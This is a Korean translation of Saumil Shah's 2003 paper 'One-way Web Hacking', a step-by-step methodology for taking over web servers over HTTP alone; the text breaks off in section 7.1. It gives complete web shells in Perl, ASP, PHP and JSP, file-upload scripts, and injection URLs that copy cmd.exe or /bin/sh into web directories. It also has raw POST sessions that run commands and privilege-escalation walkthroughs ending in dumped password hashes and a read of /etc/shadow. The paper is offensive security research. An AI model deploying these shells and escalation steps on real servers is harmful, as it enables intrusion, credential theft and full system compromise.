Microsoft Word - One-way Web Hacking.doc

Size: px
Start display at page:

Download "Microsoft Word - One-way Web Hacking.doc"

Transcription

1 One-way Web Hacking Saumil Shah 8th December, 2003 번역 : 김지환 (forc1) forc1@naver.com Table of Contents 1.0 Introduction 1.1 Components of a generic web application system 1.2 URL mappings to the web application system 2.0 Flowchart for a one-way web hack 3.0 Finding the entry point Exploiting URL parsing Exploiting poorly validated input parameters Exploiting SQL injection 3.1 Invoking the command interpreter POSTing commands to CMD.EXE POSTing commands to /bin/sh Automating the POST process 4.0 Web based command prompt Perl - perl_shell.cgi ASP - cmdasp.asp PHP - sys.php JSP - cmdexec.jsp 4.1 Installing the Web based command prompt create_cmdasp.bat Re-creating arbitrary binary files 5.0 File uploader ASP - upload.asp and upload.inc Perl - upload.cgi PHP - upload.php 6.0 One-Way Privilege Escalation 6.1 Windows/IIS privilege escalation Uploading the Windows attack tools idq.dll - privilege escalation 6.2 Linux/Apache privilege escalation Uploading the Unix attack tools ptrace1.c - privilege escalation 7.0 Web based SQL Command Prompts 7.1 Anatomy of an SQL command prompt - sqlquery.asp 7.2 An example - IIS and MS SQL server 7.3 Uploading sqlquery.asp 7.4 Pilfering the web application 7.5 Executing SQL queries via sqlquery.asp 7.6 Executing stored procedures 8.0 Concluding thoughts 9.0 References 1.0 Introduction "Necessity is the mother of invention" one-way 웹해킹은웹서버와어플리케이션서버를공격하고침투하기위한순수하게 http 트래픽에의존한공격기술이다. 이기술은웹어플리케이션공격을할때견고한방화벽과 SSL 은문제가되지않는다는걸증명하기위해나타났다. one-way 기술은오직유요한 HTTP request 과 HTTP response 만방화벽출입이허용된다는걸전제로한다.

2 제한적방화벽이있는손상된웹서버에임의의파일을업로드하는것이필요로하는상황에직면했을때, one-way 웹해킹에관한나의연구가 2000 년 4 월초에시작되었다. 그후, 다른많은기술들이개발되었고이모든기술의집합은 one-way 웹해킹방법론의창조를초래했다. one-way 웹해킹은 2001 년 Amsterdam 과 Las Vegas 에서의 Blackhat 브리핑과 Kuala Lumpur 의 HACK 2002 에서증명되었다. 1.1 Components of a generic web application system 웹어플리케이션시스템에는 4 가지요소가있다. 즉, 보통은브라우저를뜻하는웹클라이언트, fron-end 웹서버, 어플리케이션서버와어플리케이션의큰집합그리고데이타베이스서버가있다. 아래그림은각요소가어떻게상호작용하는지보여준다. 웹어플리케이션서버는어플리케이션로직, 오브젝트혹은컴파일된바이너리모두의역할을한다. front-end 웹서버는 HTML form 과 HTTP 를통해클라이언트로부터입력을받는바깥세계로향하는어플리케이션인터페이스로써의역할과 HTML 페이지폼에있는어플리케이션에의해발생된출력을전달하는역할을한다. 내부적으로, 어플리케이션은자료를전송하기위해 back-end 데이타베이스서버와접속한다. 방화벽은안으로들어오는 HTTP request 와밖으로나가는 HTML reply 를제외하곤빈틈없이설정되었다고가정한다. 1.2 URL mappings to the web application system 웹어플리케이션과상호작용하는동안, 브라우저와웹서버사이에서주고받는 URL 은다음과같은형식이다 : server / path / application? parameters 다음그림은웹어플리케이션시스템에서 URL 의각부분이다양한지역과어떻게관련이있는지설명한다.

3 방화벽은프토토콜 (http or https) 의입출력만허용한다. server 와 path 부분은 front-end 웹서버에의해분석된다. URL 해석 (e.g unicode, double-decode) 에서발생하는몇몇취약점들은 server 와 URL path 를변경함으로써익스플로잇될수있다. application 은설정되거나등록된어플리케이션서버에의해실행된다. 이부분을변경하는것은어플리케이션서버의취약점을발생시키는익스플로잇을유발할지도모른다. (e.g. JSP servlet 핸들러를사용해서임의의파일을컴파일하거나실행함 ) 만약적절히확인되지않으면, parameter 는 application 에제공된다. 결과특이한취약점이발생할지도모른다. (e.g. open() 을호출하는 Perl 에파이프문자 " " 를넣음 ) parameter 가 SQL 데이타베이스쿼리의한부분으로사용된다면, 불완전한유효 parameter 는 SQL injection 공격을야기할지도모른다. (e.g. "xp_cmdshell" 같은저장프로시져를사용해서임의의명령을실행 ) 자세한설명은 " 웹해킹 : 공격과방어 " 의챕터 5 를참고하라. 2.0 Flowchart for a one-way web hack 공격자가웹어플리케이션의취약점을찾는곳과, 앞에서언급한기술들을사용하여익스플로잇할수있는예를생각하라. 공격자는방화벽의제한에도불구하고임의의명령을실행했지만, 네트워크속으로더나아가진행할수없다. 효과적인공격을위해 2 가지가필요하다. 1. 대화형터미날접근 - 공격한서버를도용하기 ( 훔치기 ) 위한명령어를실행하거나네트워크를더깊숙히침투하기위해 2. 파일전송접근 - 포트스캐너, 루트킷등의공격툴을전송하기위해 견고한방화벽은위의일을수행하기힘들게하지만불가능한건아니다. 이제한을피하기위해, 약간의웹어플리케이션프로그래밍지식만있으면웹기반명령프롬프트와파일업로더를만들수있다. 그전에앞으로할 one-way hack 의여러단계를미리알아볼것이다. 다음그림에설명되어있다.

4 3.0 Finding the entry point one-way 해킹은타겟웹서버에서원격명령실행이이루어질때시작한다. 웹서버를공격하기위해일반적인기술몇몇을사용할수있다. 앞에서말한 URL 매핑의다른타입에기반한원격명령어를실행하는다양한방법의예를보여줄것이다. 웹서버와어플리케이션취약점에관한자세한설명은이문서에서다루지않는다. 우리의목표는쉘인터프리터 (/bin/sh, cmd.exe 등 ) 를웹서버의 document root 의한지역으로이동시킴으로써백도어를만드는것이다. 이방법은, URL 을통해쉘인터프리터를불러낼수있다. 다양한익스플로잇기술을사용하여백도어를어떻게생성하는지설명하는 3 개의예를보여줄것이다. 아래그림은엔트리포인트를찾는데사용하는몇몇기술에대한설명이다.

5 3.0.1 Exploiting URL parsing Unicode / Double decode 공격은 URL 파싱취약점의전형적인예이다. 아래의 URL 은명령어인터프리터 (cmd.exe) 를웹서버내의 "scripts/" 디렉토리로복사한다. c:\winnt\system32\cmd.exe+c:\inetpub\scripts Exploiting poorly validated input parameters 이예제에서, 검증되지않은파라미터는 URL 에서안전하지않은방법으로 open() 호출을사용하는 Perl CGI 스크립트 news.cgi 에전달된다 : cp+/bin/sh+ /usr/local/apache/cgi-bin/sh.cgi 쉘 (/bin/sh) 은 cgi-bin 디렉토리에 sh.cgi 로복사되었다 Exploiting SQL injection 여기서, 데이터베이스서버에서저장프로시저를불러내고저장프로시저를통해명령을실행시키기위해사용할수있는 SQL injection 방법을보여준다. 'copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\' 3.1 Invoking the command interpreter 우리의목표는명령인터프린터나쉘을웹으로옮김으로써생성한백도어를 HTTP 를통해리모트로불러낼수있게하는것이다. HTTP POST 메소드는이목적에가장적합하다. POST 를사용하여, 입력데이타는표준입력을통해관려된자원에전달되고, 웹서버는표준출력에의해생성된출력을 HTTP 연결을통해리턴한다. 우리는 POST 를통애명령인터프리터에어떻게명령을보내는지 2 가지예를들어설명할것이다. 하나는 Windows NT IIS 에서의 CMD.EXE, 다른하나는 Linux Apache 에서의 sh.cgi(/bin/sh 를카피한거 ).

6 3.1.1 POSTing commands to CMD.EXE 아래의예는두개의명령어가 에접근할수있는 CMD.EXE 에서실행되는걸보여준다. POST 요청은파란글씨로써있다. $ nc www1.example.com 80 POST /scripts/cmd.exe HTTP/1.0 Host: www1.example.com Content-length: 17 ver dir c:\ exit HTTP/ OK Server: Microsoft-IIS/4.0 Date: Wed, 08 Dec :13:19 GMT Content-Type: application/octet-stream Microsoft(R) Windows NT(TM) (C) Copyright Microsoft Corp. C:\Inetpub\scripts>ver Windows NT Version 4.0 C:\Inetpub\scripts>dir c:\ Volume in drive C has no label. Volume Serial Number is E43A-2A0A Directory of c:\ 10/04/00 05:28a <DIR> WINNT 10/04/00 05:31a <DIR> Program Files 10/04/00 05:37a <DIR> TEMP 10/04/00 07:01a <DIR> Inetpub 10/04/00 07:01a <DIR> certs 11/28/00 05:12p <DIR> software 12/06/00 03:46p <DIR> src 12/07/00 12:50p <DIR> weblogic 12/07/00 12:53p <DIR> weblogic_publish 12/07/99 01:11p <DIR> JavaWebServer2.0 12/07/99 06:49p 134,217,728 pagefile.sys 12/07/99 07:24a <DIR> urlscan 12/07/99 04:55a <DIR> Netscape 13 File(s) 134,217,728 bytes 120,782,848 bytes free

7 C:\Inetpub\scripts>exit $ 명령어를올바르게보내기위한 CMD.EXE 와 CMD.EXE 의출력을올바르게리턴하기위한웹서버를위해약간주의가필요하다. 위의예제에서, CMD.EXE 로의입력스트림을올바르게끝내는걸확실히하기위해 "exit" 명령어를포함했다. POST request 의 Content-length 는 "exit" 에의해여분의문자열을염두해서계산되었다 POSTing commands to /bin/sh 아래의예는 에서접근가능한 /bin/sh 에서작동하고있는 3 가지명령을보여준다. POST request 는파란글씨로써있다. $ nc www2.example.com 80 POST /cgi-bin/sh.cgi HTTP/1.0 Host: www2.example.com Content-type: text/html Content-length: 60 echo 'Content-type: text/html' echo uname id ls -la / exit HTTP/ OK Date: Thu, 27 Nov :47:20 GMT Server: Apache/ Connection: close Content-Type: text/html Linux uid=99(nobody) gid=99(nobody) groups=99(nobody) total 116 drwxr-xr-x 19 root root 4096 Feb drwxr-xr-x 19 root root 4096 Feb drwxr-xr-x 2 root root 4096 Jun bin drwxr-xr-x 2 root root 4096 Nov 28 02:01 boot drwxr-xr-x 6 root root Nov 28 02:01 dev drwxr-xr-x 29 root root 4096 Nov 28 02:01 etc drwxr-xr-x 8 root root 4096 Dec home drwxr-xr-x 4 root root 4096 Jun lib drwxr-xr-x 2 root root Jun lost+found drwxr-xr-x 4 root root 4096 Jun mnt drwxr-xr-x 3 root root 4096 Feb opt dr-xr-xr-x 37 root root 0 Nov proc

8 drwxr-x--- 9 root root 4096 Feb root drwxr-xr-x 3 root root 4096 Jun sbin drwxrwxr-x 2 root root 4096 Feb src drwxrwxrwt 7 root root 4096 Nov 28 02:01 tmp drwxr-xr-x 4 root root 4096 Feb u01 drwxr-xr-x 21 root root 4096 Feb usr drwxr-xr-x 16 root root 4096 Jun var $ 아파치를통한 /bin/sh 의 care 와 feeding 은약간다르다. 아파치는모든 CGI 프로그램으로부터잘형성된 HTTP 응답해더를기대한다. 그러므로출력에 "Content-type: text/html" 라인을보내야만한다. 두개의 "echo" 명령어는이때문이다. ( 역자주 : care and feeding of /bin/sh over Apache 를어떻게해석해야할까.. -_-a) Automating the POST process 우리는명령을위한적당한 POST request 와그것들을웹서버에보내는일을자동화하기위해두개의펄스크립트 post_cmd.pl 과 post_sh.pl 을만들었다. post_cmd.pl 에대한 syntax 는다음과같다. usage: post_cmd.pl url [proxy:port] < data By Saumil Shah (c) net-square 2001 post_cmd.pl takes all the data to be POSTed to the URL as standard input. Either enter the data manually and hit ^D (unix) or ^Z (dos) to end; or redirect the data using files or pipes post_cmd.pl 은 HTTP 프록시서버를통해 POST request 를터널링할수있도록쓰여졌다. post_sh.pl 도비슷하다. 아래의예는우리가직접 POST request 를하는것대신에펄스크립트를사용하는것과결과가같다는걸보여준다. Output of post_cmd.pl $./post_cmd.pl ver dir c:\ ^D HTTP/ OK Server: Microsoft-IIS/4.0 Date: Wed, 08 Dec :05:46 GMT Content-Type: application/octet-stream Microsoft(R) Windows NT(TM) (C) Copyright Microsoft Corp. C:\Inetpub\scripts>ver Windows NT Version 4.0 C:\Inetpub\scripts>dir c:\ Volume in drive C has no label. Volume Serial Number is E43A-2A0A

9 Directory of c:\ 10/04/00 05:28a <DIR> WINNT 10/04/00 05:31a <DIR> Program Files 10/04/00 05:37a <DIR> TEMP 10/04/00 07:01a <DIR> Inetpub 10/04/00 07:01a <DIR> certs 11/28/00 05:12p <DIR> software 12/06/00 03:46p <DIR> src 12/07/00 12:50p <DIR> weblogic 12/07/00 12:53p <DIR> weblogic_publish 12/07/99 01:11p <DIR> JavaWebServer2.0 12/07/99 06:49p 134,217,728 pagefile.sys 12/07/99 07:24a <DIR> urlscan 12/07/99 04:55a <DIR> Netscape 13 File(s) 134,217,728 bytes 120,782,848 bytes free C:\Inetpub\scripts>exit $ Output of post_sh.pl $./post_sh.pl uname id ls -la / ^D HTTP/ OK Date: Thu, 27 Nov :43:54 GMT Server: Apache/ Connection: close Content-Type: text/html Linux uid=99(nobody) gid=99(nobody) groups=99(nobody) total 116 drwxr-xr-x 19 root root 4096 Feb drwxr-xr-x 19 root root 4096 Feb drwxr-xr-x 2 root root 4096 Jun bin drwxr-xr-x 2 root root 4096 Nov 28 02:01 boot drwxr-xr-x 6 root root Nov 28 02:01 dev drwxr-xr-x 29 root root 4096 Nov 28 02:01 etc drwxr-xr-x 8 root root 4096 Dec home drwxr-xr-x 4 root root 4096 Jun lib drwxr-xr-x 2 root root Jun lost+found

10 drwxr-xr-x 4 root root 4096 Jun mnt drwxr-xr-x 3 root root 4096 Feb opt dr-xr-xr-x 37 root root 0 Nov proc drwxr-x--- 9 root root 4096 Feb root drwxr-xr-x 3 root root 4096 Jun sbin drwxrwxr-x 2 root root 4096 Feb src drwxrwxrwt 7 root root 4096 Nov 28 02:01 tmp drwxr-xr-x 4 root root 4096 Feb u01 drwxr-xr-x 21 root root 4096 Feb usr drwxr-xr-x 16 root root 4096 Jun var $ 이방법으로, HTTP POST request 를사용해서타겟웹서버에여러명령을보낼수있다. 이개념은웹서버에임의의파일은생성하는데쓰일것이다. 섹션 4.1 에서논의된다. 4.0 Web based command prompt 원격명령실행을수행한후, 타겟웹서버에대화형명령을실행할수있어야한다. 이것을하는일반적인방법은쉘을띄우거나타겟웹서버에 TCP 포트를바인드시키는거나, TCP listener 로쉘연결을띄우거나, 원격 X 디스플레이로 xterm 을실행시킨다. 그러나들어오는트래픽으로오직 HTTP request 와나가는트래픽으로 HTTP respond 만허용하는견고한방화벽에선이와같은기술은작동하지않는다. 우리는여기에이러한제한을피하는 " 웹기반명령프롬프트 " 의예를보여줄것이다. 웹기반의명령프롬프트는 HTML form 을통해 semi-interative 쉘터미널기능을제공한다. form 은 <INPUT> 필드로명령을받아들이고미리형식화된텍스트에출력결과를표시한다. 웹기반명령프롬프트가 semi-interative 인이유는현재작업디렉토리, 시스템환경등과같은터미널의상태를저장하기않기때문이다. 세션기반의 HTML form 에서실행될수있지만이문서에서다루지않는다. 웹기반명령프롬프트에의해실행된명령은웹서버프로세서권한임을가정한다. 전형적으로, 아파치가실행중인유닉스시스템에서 uid 는 "nobody" 고, IIS 가실행중인 windows 시스템에서의권한은 "IUSR_machinename" 혹은 "IWAM_machinename" 이다. 아래에웹기반명령프롬프트의네가지예제가있다 Perl - perl_shell.cgi Perl 과 cgi-lib.pl 을사용하는다음의스크립트는 semi-interative 웹기반의명령프롬프트를제공한다. #!/usr/bin/perl require "cgi-lib.pl"; print &PrintHeader; print "<FORM ACTION=perl_shell.cgi METHOD=GET>\n"; print "<INPUT NAME=cmd TYPE=TEXT>\n"; print "<INPUT TYPE=SUBMIT VALUE=Run>\n"; print "</FORM>\n"; &ReadParse(*in); if($in{'cmd'} ne "") { print "<PRE>\n$in{'cmd'}\n\n";

11 print `/bin/bash -c "$in{'cmd'}"`; print "</PRE>\n"; } ASP - cmdasp.asp 다음의 ASP 스크립트는 IIS 가실행중인 windows 서버에대한웹기반명령프롬프트다. cmdasp.asp 는 Maceo(maceo at dongmile.com) 가만든원본스크립트의수정된버젼이다. <% %> Dim oscript, oscriptnet, ofilesys, ofile, szcmd, sztempfile On Error Resume Next Set oscript = Server.CreateObject("WSCRIPT.SHELL") Set oscriptnet = Server.CreateObject("WSCRIPT.NETWORK") Set ofilesys = Server.CreateObject("Scripting.FileSystemObject") szcmd = Request.Form(".CMD") If (szcmd <> "") Then sztempfile = "C:\" & ofilesys.gettempname( ) Call oscript.run ("cmd.exe /c " & szcmd & " > " & sztempfile, 0, True) Set ofile = ofilesys.opentextfile (sztempfile, 1, False, 0) End If <FORM action="<%= Request.ServerVariables("URL") %>" method="post"> <input type=text name=".cmd" size=45 value="<%= szcmd %>"> <input type=submit value="run"> </FORM>

12 <PRE> <% If (IsObject(oFile)) Then On Error Resume Next Response.Write Server.HTMLEncode(oFile.ReadAll) ofile.close Call ofilesys.deletefile(sztempfile, True) End If %> </PRE> 다른 ASP 기반의명령프롬프트스크립트를통한이스크립트의이점은쉘명령을실항하기위해등록되야할 COM 콤포넌트가필요없다는사실이다. 관리자권한역시필요없다 PHP - sys.php PHP 로웹기반쉘을만드는건매우간단하다. 다음의스크립트는 PHP 로웹기반쉘을설명한다. <FORM ACTION="sys.php" METHOD=POST> Command: <INPUT TYPE=TEXT NAME=cmd> <INPUT TYPE=SUBMIT VALUE="Run"> <FORM> <PRE> <?php if(isset($cmd)) { system($cmd);

13 }?> <PRE> JSP - cmdexec.jsp 다음의 JSP 코드는자바서버페이지를지원하는 J2EE 어플리케이션서버에대한웹기반명령프롬프트다. <FORM METHOD=GET ACTION='cmdexec.jsp'> <INPUT name='cmd' type=text> <INPUT type=submit value='run'> </FORM> <%@ page import="java.io.*" %> <% String cmd = request.getparameter("cmd"); String output = ""; if(cmd!= null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader si = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = si.readline())!= null) { output += s; } } catch(ioexception e) { e.printstacktrace(); } } %> <pre> <%=output %> </pre> (Thanks to Shreeraj Shah for cmdexec.jsp) 실행되기위해 native OS 명령을허락하는어떤웹어플리케이션프로그래밍언어는웹기반명령프롬프트를만들수있다.

14 4.1 Installing the Web based command prompt 원격명령실행을사용하여, 우리는 "echo" 같은명령을수행하거나출력을파일로리다이렉트할수있다. 다양한 "echo" 명령어를사용하여, 원격웹서버에단번에한라인의파일을생성할수있다. 여기서선행조건은타겟웹서버에기록할수있는디렉토리가필요하다는거다 create_cmdasp.bat 다음은섹션 에서보연준 cmdasp.asp 파일을재현 (recreate) 하기위해 Windows DOS 프롬프트에서실행될수있는명령어 set 이다. echo ^<^% > cmdasp.asp echo Dim oscript, oscriptnet, ofilesys, ofile, szcmd, sztempfile >> cmdasp.asp echo On Error Resume Next >> cmdasp.asp echo Set oscript = Server.CreateObject(^"WSCRIPT.SHELL^") >> cmdasp.asp echo Set oscriptnet = Server.CreateObject(^"WSCRIPT.NETWORK^") >> cmdasp.asp echo Set ofilesys = Server.CreateObject(^"Scripting.FileSystemObject^") >> cmdasp.asp echo szcmd = Request.Form(^".CMD^") >> cmdasp.asp echo If (szcmd ^<^> ^"^") Then >> cmdasp.asp echo sztempfile = ^"C:\^" & ofilesys.gettempname() >> cmdasp.asp echo Call oscript.run(^"cmd.exe /c ^" ^& szcmd ^& ^" ^> ^" ^& sztempfile,0,true) >> cmdasp.asp echo Set ofle = ofilesys.opentextfile(sztempfile,1,false,0) >> cmdasp.asp echo End If >> cmdasp.asp echo ^%^> >> cmdasp.asp echo ^<FORM action=^"^<^%= Request.ServerVariables(^"URL^") ^%^>^" method=^"post^"^> >> cmdasp.asp echo ^<input type=text name=^".cmd^" size=70 value=^"^<^%= szcmd ^%^>^"^> >> cmdasp.asp echo ^<input type=submit value=^"run^"^> >> cmdasp.asp echo ^</FORM^> >> cmdasp.asp echo ^<PRE^> >> cmdasp.asp echo ^<^% >> cmdasp.asp echo If (IsObject(oFile)) Then >> cmdasp.asp echo On Error Resume Next >> cmdasp.asp echo Response.Write Server.HTMLEncode(oFile.ReadAll) >> cmdasp.asp echo ofile.close >> cmdasp.asp echo Call ofilesys.deletefile(sztempfile, True) >> cmdasp.asp echo End If >> cmdasp.asp echo ^%^> >> cmdasp.asp echo ^<^/PRE^> >> cmdasp.asp 위의명령들은타겟웹서버에서 "cmdasp.asp" 파일을생성하기위해 post_cmd.pl 과같은스크립트를통해실행될수있다. 같은방법으로, 어떤임의의텍스트파일은 "echo" 같은명령을사용하는서버에서재현할수있다. &, ", <, >,, %, 등과같은쉘메타문자는적정할탈출문자로적절하게 escape 되야한다. 대부분의유닉스쉴에서탈출문자는 "/" 이고, Windows 명령쉘에서의탈출문자는 "^" 이다. 다른웹기반명령프롬프트는같은방법으로타겟웹서버에서재현될수있다 Re-creating arbitrary binary files

15 유닉스 Bourne shell 같은쉘에서, "\xhh" 형식을사용하여파일에임의의문자열을쓰기위해 "echo" 명령을사용하는게가능하다. HH 에는두개의 16 진수가들어간다. 바이너리파일은다음과같은 16 진수두개의문자열로표현된다. echo -e "\x0b\xad\xc0\xde\x0b\xad\xc0\xde\x0b\xad\xc0\xde" > file CMD.EXE 가임의의문자를쓸수없다고하더라도 Windows 에서임의의파일을재현하는것또한가능하다. 임의의바이너리파일을만들기위해스크립트나 non-interactive 모드가있는 DEBUG.EXE 를이용해서속인다. 5.0 File uploader 타켓웹서버에서명령을실행할수있게하기위해추가적으로, 공격자는웹서버안으로파일을전송하는쪽으로관심를가져야한다. FTP, NFS, NetBIOS 등과같은보통의기술은방화벽이이것들을막기때문에작동하지않는다. 이장애물을피하기위해선, 우리는파일업로더를만들어야한다. 섹션 에언급된이기술은큰파일에대해선매우느릴수있다. 더좋은선택이있긴하지만... HTTP POST Multipart-MIME 메소드를이용해서파일업로드가가능하다. 파일의내용은 HTTP POST request 로서버에전달된다. 서버에서, 업로드스크립트가이내용들을받고파일에저장한다. HTTP Multipart-MIME POST request 에대한자세한설명은이문서에서다루지않는다. 파일을업로드하기위해선, 웹서버프로세스 (nobody, IUSR_machinename, IWAM_machinename, etc ) 가파일을생성하거나쓸수있는권한을가진디렉토리가필요하다. 아래는업로드스크립트에관한 3 가지예제다 ASP - upload.asp and upload.inc 다음의두개의파일에는 HTTP POST Multipart-MIME 데이터를받고그것을저장하기위한코드가있다. ASP 에는 Multipart-MIME 인코드된데이터를디코딩하기위한 built-in 루틴이없다. 그러므로루틴을지원하는추가의파일 (upload.inc) 이필요하다. upload.asp <form method=post ENCTYPE="multipart/form-data"> <input type=file name="file1"> <input type="submit" Name="Action" value="upload"> </form> <hr> <!--#INCLUDE FILE="upload.inc"--> <% If Request.ServerVariables("REQUEST_METHOD") = "POST" Then End If %> Set Fields = GetUpload() If Fields("File1").FileName <> "" Then End If Fields("File1").Value.SaveAs Server.MapPath(".") & "\" & Fields("File1").FileName Response.Write("<LI>Upload: " & Fields("File1").FileName) 관련파일 (upload.inc) 의소스코드는여기서찾을수있다.

16 5.0.2 Perl - upload.cgi Perl 과 cgi-lib.pl 을사용해서, 업로더스크립트를생성하는건쉽다. 다음예제에서어떻게하는지보여준다. #!/usr/bin/perl require "cgi-lib.pl"; print &PrintHeader; print "<form method='post' enctype='multipart/form-data' action='upload.cgi'>\n"; print "File path: <input type=file name=upfile>\n"; print "<input type=submit value=upload></form>\n"; &ReadParse; PHP - upload.php PHP 로업로더를만드는것은매우간단하다. <FORM ENCTYPE="multipart/form-data" ACTION="upload.php" METHOD=POST> <INPUT TYPE="hidden" name="max_file_size" value=" "> <input type="file" name="userfile" size="30"> <INPUT TYPE="submit" VALUE="upload"> </FORM> <?php

17 if($userfile_name!= "") { copy("$userfile", "./$userfile_name") or die("couldnt copy file"); echo "File name: $userfile_name<br>\n"; echo "File size: $userfile_size bytes<br>\n"; echo "File type: $userfile_type<br>\n"; }?> 우리는 HTTP 를통해명령을실행시킬수있고파일을쉽게업로드한다. 우리는타겟웹서버에원하는건무엇이든할수있다. 다음과같은것들이가능하다. 웹서버에있는소스코드나설정파일을발견함 타겟웹서버와관련있는내부네트워크를발견함 웹서버에공격툴을업로드하고그것을실행함... and much more 웹서버프로세스가권한을확장하는데제한이있기때문에, 다음단계는권한상승을시도하는것이다. 다음섹션은이것에대해설명한다. 6.0 One-Way Privilege Escalation 섹션 4.0 에서언급한웹기반명령프롬프트는실행될동안프로세스권한을상속받는다. 보통, 웹서버프로세스가높은권한으로실행되고있지않다면, 권한은사용자레벨권한에의해제한된다. 소수의어플리케이션서버는높은권한으로실행한다. 대부분의경우, 웹기반명령프롬프트와 HTTP 파일업로더를설치한후, 더깊이침투하기위한권한상승의몇몇방법이필요하다. 권한상승공격은특별한게없다. 슈퍼유저나더높을권한의유져로권한을상승시키는여러운영체제에관한익스플로잇이많이있다. 대부분의권한상승공격은 one-way 공격기술로적합하다. 권한상승공격의자세한설명은이문서에서다루지않는다. 우리는권한상승공격의두가지예를설명할것이다. Windows 와 IIS 플렛폼에대한 "Microsoft IIS 5.0 In-Process Table Privilege Elevation Vulnerability", Linux 와 Apache 플렛폼에대한 "Linux Ptrace/Setuid Exec Vulnerability" 권한상승익스플로잇은비대화형 (non-interactively) 으로실행됨을주의해야한다. 예를들어, 그것은대화식 (interactively) 쉘, 터미널, GUI 콘솔등이필요없다. 이예제에서, 우리는 one-way 사용에대해적합하게하기위해 Linux ptrace 익스플로잇을수정해야한다. 6.1 Windows/IIS privilege escalation IIS 5.0 가실행중인 Windows 서버인 www1.example.com 의경우를보자. 이미손상되었고, 섹션 에나온파일업로더스크립트 upload.asp 가서버에깔려있다고가정할것이다 Uploading the Windows attack tools 이제섹션 에서설명된웹기반명령프롬프트 (cmdasp.asp) 와두개의바이너리파일 (idq.dll, pwdump.exe) 을추가로업로드할것이다. idq.dll 은 Microsoft IIS 5.0 In-Process 테이블권한상승취약점을이용한권한상승익스플로잇이다. 그것은관리자그룹에 IUSR_machinename 과 IWAM_machinename 계정을추가한다. 모든프로세스와어플리케이션에관리자권한을준것은 ( 웹기반명령프롬프트를포함해서 ) IIS 프로세스아래에서실행된다. pwdump.exe 는패스워드해쉬를덤프하기위한바이너리고, 실행을위해서관리자권한이필요하다. 아래스크린샷은 www1.example.com 에업로드하고있는세개의바이너리파일을보여준다.

18 아래에보이는것처럼, 파일이성공적으로업로드되었는지 cmdasp.asp 로 "dir" 명령을실행함으로써확인할수있다. 이제아래그림에서같이 "net localgroup administrators" 명령을내림으로써관리자그룹의맴버를확인할것이다.

19 관리자그룹의맴버는 Administrator 뿐이다 idq.dll - privilege escalation 다음단계는 IUSR_machinename 과 IWAM_machinename 계정의권한을상승시키기위해서 idp.dll 을불러내는것이다. 프로세스는매우간단하다. 다음의 URL 은 웹서버에서접근되야한다. 결과가출력되지않는다. 그대신에잠시후연결은중단된다. 이것은공격이거의성공했음을암시한다. 공격이정말로성공했는지확인하기위해, 아래그림과같이관리자그룹의맴버를다시한번확인할것이다. IUSR_W2KVM 과 IWAM_W2KVM 계정은이제관리자그룹맴버이다. 따라서아래그림에서 pwdump.exe 바이너리실행함으로써증명되기때문에 cmdasp.asp 를통해실행된모든명령은관리자권한이라가정한다.

20 이제 www1.example.com 의모든관리제어권을가지고있다. 6.2 Linux/Apache privilege escalation 이예제를위해, 2.4 커널과 Apache 이실행중인리눅스서버 www2.example.com 를볼것이다. 앞의예제와같이, 이미손상되었고파일업로더스크립트 upload.cgi 가이서버에설치되었다고가정한다 Uploading the Unix attack tools 이서버를위해, 우리는섹션 에서설명된웹기반명령프롬프트 (shell.cgi) 와다른파일 (ptrace1.c) 를업로드할것이다. ptrac1.c 는리눅스기반의 Ptrace/Setuid 실행취약점권한상승익스플로잇이다. 그익스플로잇은 one-way 사용에적합하게하기위해약간수정되었다. 성공적으로실행되었을때, 익스플로잇은 /bin/bash 에소유자가 root 인 setuid 퍼미션을적용시킨다. 이것은슈퍼유저권한으로실행하기위해 /bin/bash 를통한쉘명령의실행을일으킨다. 웹기반명령프롬프트 (shell.cgi) 는내부적으로 /bin/bash 를불러내고, 따라서 shell.cgi 를통한모든실행된명령은 root 유져로실행될것이다. 수정된 ptrace 익스플로잇의소스코드는여기서구할수있다. 아래의스크린샷은 www2.example.com 에업로드되고있는두개의파일을보여준다. 이제 ptrace1.c 를컴파일하고올바르게컴파일됐는지확인할것이다. 또한현재권한을확인할것이다. 아래스크린샷은다음의명령이 shell.cgi 를통해실행되는걸보여준다. gcc -o ptrace1 ptrace1.c ls -la id

21 shell.cgi 의권한은 "nobody" 사용자다 ptrace1.c - privilege escalation 다음단계는 /bin/sh 에 setuid 퍼미션을적용할수있는지보기위해 ptrace1 을실행하는걸시도하는것이다. 익스플로잇 ptrace1.c 은내부적으로다음의명령을실행시킨다. /bin/chmod 4755 /bin/bash 아래의스크린샷은 ptrace1 이실행되고 /bin/sh 에대한파일리스팅하는걸보여준다. 물론충분한, /bin/bash 바이너리는그것에적용된 setuid 퍼미션이있다. 다음스크린샷은실행되고있는두개의명령을보여준다. id cat /etc/shadow

22 shell.cgi 프로세스의유효 uid (euid) 는 root 유저인 0 이란걸주의하라. /etc/shadow 파일의내용을볼수있다는것은권한이상승되었음을증명한다 우리는이제 www2.example.com 의 full 슈퍼유저제어권을가지고있다. 7.0 Web based SQL Command Prompts One-way 해킹은파일전송과 HTTP 를통한원격명령실행이외의영역으로확장될수있다. 어플리케이션에서가장중요한요소중하나는데이터베이스이다. 이섹션에서는 one-way 해킹의개념을대화형제어데이터베이스서버 ( 웹기반 SQL 명령프롬프트 ) 에어떻게확장할수있는지보여준다. 웹기반 SQL 명령프롬프트는사용자가 HTML 인터페이스를통해데이터베이스서버에연결하고, HTML 폼을통해 back-end 데이터베이스에서 SQL 쿼리를실행하는걸허용한다. 어떤데이터베이스라도웹어플리케이션과연동되어사용하기때문에웹기반 SQL 명령프롬프트는같은기술을사용한다. PHP 와 ASP 와같은웹프로그래밍언어는 back-end 데이터베이스로연결하는기능을제공한다. 많은경우, 일단웹서버가손상되면, 일반적으로공격자는데이터베이스가있는곳과그곳에접근할자격이있는곳을알아내기위해웹서버에호스트된소스코드와어플리케이션설정파일을찾는다. 이정보는웹기반 SQL 명령프롬프트를사용하는데이터베이스를공격할때사용될수있다. 7.1 Anatomy of an SQL command prompt - sqlquery.asp 아래그림은 ASP 로만들어진웹기반 SQL 명령프롬프트의한예를보여준다. 이폼에다섯개의키입력공간이있다.. Server Name: 데이터베이스서버의 symbolic name 이나 IP 주소. 대부분의경우, 데이터베이스서버는웹서버와완전히다른시스템이다. Database Name: 데이타베이스서버에호스트되는데이타베이스의모임중데이타베이스의이름. User Name: 데이터베이스연결을사용할자격을가진데이터베이스사용자. Password: 데이터베이스사용자의패스워드. 일반적으로, 